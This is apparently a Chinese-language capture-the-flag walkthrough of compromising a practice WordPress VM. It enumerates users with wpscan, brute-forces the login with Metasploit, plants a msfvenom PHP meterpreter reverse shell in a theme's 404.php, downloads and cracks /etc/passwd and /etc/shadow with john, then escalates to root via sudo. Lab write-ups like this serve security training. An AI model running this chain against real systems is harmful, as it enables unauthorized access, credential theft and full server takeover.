web安全暴力破解
信息探测
信息探测与之前的探测策略一样
深入挖掘
http://192.168.56.103/secret/
http://192.168.56.103/secret/wp-login.php
但是发现站点登录不上去,怎么办呢?
打不开的网页可以设置对应的站点,通过把相应的站点改为IP地址即可
gedit /etc/hosts
靶场IP 无法登录的站点
解析一下网页结构
之后就可以再次登陆了。
暴力破解
首先要查看用户名
wpscan
wpscan --url www.vtcsec.com/secret/ --enumerate u
得到了用户名以及密码了。
之后启动msfconsole
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
set rhosts
set pass_file /usr/share/wordlists/dirb/common.txt
set user admin
set targeturi /secret/
set rhosts IP
set username admin
run
上传webshell获取控制权
制作一个对应的shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.17.128 lport=4444 -f raw
back
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.253.12
run
run 之后像之前对应的网页上传webshell,等待反弹权限,这里就不介绍了。
http://192.168.253.20/secret/wp-content/themes/twentysevevteen/404.php
sysinfo
id
root权限
下载passwd以及shadow
download /etc/passwd
download /etc/shadow
unshadow passwd shadow > cracked
john cracked
之后破解对应的用户名以及密码。
记得优化终端。
python -c "import pty;pty.spawn('/bin/bash')"
之后准备获取root权限。
但是这里并没有获取root权限,只是一个比普通用户权限,我们使用。
su - marlinspike
sudo -l
sudo bash
返回root权限了。
获取flag